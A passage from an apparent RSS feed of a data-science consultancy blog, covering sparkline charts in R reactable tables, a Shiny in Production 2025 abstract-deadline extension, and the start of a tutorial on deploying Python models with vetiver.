&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;table &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(data,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;values[[index]], type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;box&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;values[[index]], type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;line&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;values[[index]], type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bar&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="230" src="https://www.jumpingrivers.com/misc/reactable-sparkline/html_files/table1.html" alt="reactable table displaying sparkline boxplots and line &amp;amp; bar charts" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;h3 id="bullet-chart"&gt;Bullet Chart&lt;/h3&gt;
&lt;p&gt;In our final example, I am again using the &lt;code&gt;iris&lt;/code&gt; data but this time I’m
creating a summary for each species containing the mean and
inter-quartile range (IQR) of the Sepal.Length column. These values will
be used to create a &lt;a href="https://www.storytellingwithdata.com/blog/what-is-a-bullet-graph" rel="external"&gt;bullet
graph&lt;/a&gt;.
In a bullet graph, an observed value (the ‘performance’) is compared
against a target value, and an illustration of the data-spread (here the
IQR) are presented. In a given row of the figure, the value of
Sepal.Width for a specific iris will be presented as the performance;
the target that this is compared against is the mean for the relevant
species, lower IQR will be the range1 and higher IQR will be range2.&lt;/p&gt;
&lt;p&gt;Then when creating our reactable table it is slightly different to our
previous example (where I just pass a list of values to the sparkline
function), for a bullet graph I will need to pass in a vector in the
form &lt;code&gt;c(target, performance, range1, range2)&lt;/code&gt;. I can then access the
values via &lt;code&gt;d$&lt;/code&gt; (or another form of extraction) and specify which row I
need with &lt;code&gt;[[index]]&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;d &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; iris &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Species) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lower_range &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;range&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length)[1],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; upper_range &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;range&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length)[2],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bullet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;iris_table &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(d, defaultColDef &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Species &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Sepal.Length &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bullet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mean[[index]],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length[[index]],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;upper_range[[index]],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;lower_range[[index]]), type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bullet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }, show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="510" src="https://www.jumpingrivers.com/misc/reactable-sparkline/html_files/table2.html" alt="reactable table displaying iris data and sparkline bullet chart" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;p&gt;In this blog we have implemented box-plots, bar, line and bullet graphs
into reactable tables. Other options can be found on the &lt;a href="https://omnipotent.net/jquery.sparkline/#s-about" rel="external"&gt;jQuery
Sparklines website&lt;/a&gt; or
in the previous blog. Stay tuned for the next blog in this series on
using sparkline reactable tables in Shiny apps.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sparkline-reactable/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: Abstracts Deadline Extension</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-abstracts-extension/</link><pubDate>Tue, 11 Mar 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-abstracts-extension/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-abstracts-extension/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="call-for-abstracts-deadline-extended"&gt;Call for Abstracts Deadline Extended&lt;/h3&gt;
&lt;p&gt;Good news! We’re extending the deadline for abstract submissions for &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production 2025&lt;/a&gt; by two weeks. You now have until 11:59 PM BST on 3rd April 2025 to submit your proposal.&lt;/p&gt;
&lt;p&gt;This extension gives you extra time to refine your ideas and submit a strong proposal for the conference, which will take place on 8th-9th October 2025 in Newcastle upon Tyne, UK.&lt;/p&gt;
&lt;h3 id="why-submit"&gt;Why Submit?&lt;/h3&gt;
&lt;p&gt;Shiny in Production is the premier event for developers, data scientists, and industry professionals using &lt;a href="https://shiny.posit.co/" rel="external"&gt;{shiny}&lt;/a&gt; in production environments. If you have insights, case studies, or innovative applications of Shiny, this is your chance to share your expertise with the community.&lt;/p&gt;
&lt;h3 id="topics-of-interest"&gt;Topics of Interest&lt;/h3&gt;
&lt;p&gt;We invite abstracts on a wide range of topics, including but not limited to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;AI &amp;amp; Machine Learning in Shiny:&lt;/strong&gt; Integrating predictive models, LLMs, and generative AI into Shiny applications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shiny for Large Enterprises:&lt;/strong&gt; How big companies successfully deploy and maintain Shiny apps.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Storytelling with Shiny:&lt;/strong&gt; Making complex data insights accessible through compelling visual narratives.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shiny vs. Other Web Frameworks:&lt;/strong&gt; A comparison of when and why to choose Shiny over alternatives.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Beyond Dashboards / Creative Uses of Shiny:&lt;/strong&gt; Exploring non-traditional applications like simulations, process automation, and interactive reports.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Python:&lt;/strong&gt; Developing Python Shiny apps&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Testing and Continuous Deployment:&lt;/strong&gt; Best practices for maintaining high-quality applications through automated workflows.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To get an idea of past topics, check out our YouTube channel, where we have playlists of talks from Shiny in Production &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD&amp;si=b2GWgsZ-k5WC8QAD" rel="external"&gt;2022,&lt;/a&gt; &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJcO4Srr6mnQorL3wFhiV7t&amp;si=BGLJYKWc5ZIGwrUZ" rel="external"&gt;2023&lt;/a&gt; and
&lt;a href="https://www.youtube.com/watch?v=8mLFQUwnU5g&amp;list=PLbARZQfpqIKK3fHYTo__ZY-IIsF2eiE0X" rel="external"&gt;2024&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="submission-guidelines"&gt;Submission Guidelines&lt;/h3&gt;
&lt;p&gt;To submit your abstract, please follow these guidelines:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Abstract length: Up to 250 words.&lt;/li&gt;
&lt;li&gt;Deadline: Submissions must be received by 11:59PM BST on &lt;del&gt;20th March 2025&lt;/del&gt; 3rd April 2025.&lt;/li&gt;
&lt;li&gt;Submission portal: Submit your abstract &lt;a href="https://jumpingrivers.typeform.com/to/WnGwkqYy" rel="external"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="important-dates"&gt;Important Dates&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Abstract submission deadline: &lt;del&gt;20th March 2025&lt;/del&gt; 3rd April 2025&lt;/li&gt;
&lt;li&gt;Notification of acceptance: mid-April 2025&lt;/li&gt;
&lt;li&gt;Conference dates: 8th-9th October 2025&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, visit our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-r-events-abstracts-extension/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Vetiver: MLOps for Python</title><link>https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/</link><pubDate>Thu, 27 Feb 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This post is the fourth in our series on MLOps with vetiver:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/"&gt;Vetiver: First steps in
MLOps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/"&gt;Vetiver: Model
Deployment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/"&gt;Vetiver: Monitoring Models in
Production&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 4: Vetiver: MLOps for Python (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Parts 1 to 3 introduced the {vetiver} package for R and outlined its
far-reaching applications in MLOps. But did you know that this package
is also available in Python? In this post we will provide a brief
outline to getting your Python models into production using &lt;a href="https://rstudio.github.io/vetiver-python/stable/" rel="external"&gt;vetiver for
Python&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-vetiver-mlops-python-deployment"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="installation"&gt;Installation&lt;/h2&gt;
&lt;p&gt;Like any other Python package on &lt;a href="https://pypi.org/" rel="external"&gt;PyPI&lt;/a&gt;, vetiver can
be installed using pip. Let’s set up a virtual environment and install
all of the packages that will be covered in this blog:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m venv venv/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install vetiver pandas pyjanitor scikit-learn pins
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Check out our &lt;a href="https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/"&gt;previous blog about virtual environments in
Python&lt;/a&gt; for more
details.&lt;/p&gt;
&lt;h2 id="data"&gt;Data&lt;/h2&gt;
&lt;p&gt;We will be working with the &lt;a href="https://www.kaggle.com/datasets/kumarajarshi/life-expectancy-who/data" rel="external"&gt;World Health Organisation Life
Expectancy&lt;/a&gt;
data which provides the annual average life expectancy in a number of
countries. This can be downloaded from
&lt;a href="https://www.kaggle.com/" rel="external"&gt;Kaggle&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://www.kaggle.com/api/v1/datasets/download/kumarajarshi/life-expectancy-who&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(url, compression &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;zip&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Country Year ... Income composition of resources Schooling&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 0 Afghanistan 2015 ... 0.479 10.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 Afghanistan 2014 ... 0.476 10.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 Afghanistan 2013 ... 0.470 9.9&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 Afghanistan 2012 ... 0.463 9.8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 Afghanistan 2011 ... 0.454 9.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [5 rows x 22 columns]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s drop missing data, clean up the column names and select a subset
of the variables to work with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;janitor&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;dropna()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;clean_names(strip_underscores&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;life_expectancy&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;percentage_expenditure&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;total_expenditure&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;population&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bmi&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;schooling&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; life_expectancy percentage_expenditure ... bmi schooling&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 0 65.0 71.279624 ... 19.1 10.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 59.9 73.523582 ... 18.6 10.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 59.9 73.219243 ... 18.1 9.9&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 59.5 78.184215 ... 17.6 9.8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 59.2 7.097109 ... 17.2 9.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [5 rows x 6 columns]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Vetiver is compatible with models built in
&lt;a href="https://scikit-learn.org/stable/" rel="external"&gt;scikit-learn&lt;/a&gt;,
&lt;a href="https://pytorch.org/" rel="external"&gt;PyTorch&lt;/a&gt;,
&lt;a href="https://xgboost.readthedocs.io/en/stable/python/" rel="external"&gt;XGBoost&lt;/a&gt; and
&lt;a href="https://www.statsmodels.org/stable/" rel="external"&gt;statsmodels&lt;/a&gt;. The actual modelling
process is not so important in this blog. We will be more interested in
how we go about taking this model into production using vetiver. So
let’s go with a simple &lt;em&gt;K&lt;/em&gt;-Nearest Neighbour model built using
scikit-learn:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.neighbors&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; KNeighborsRegressor
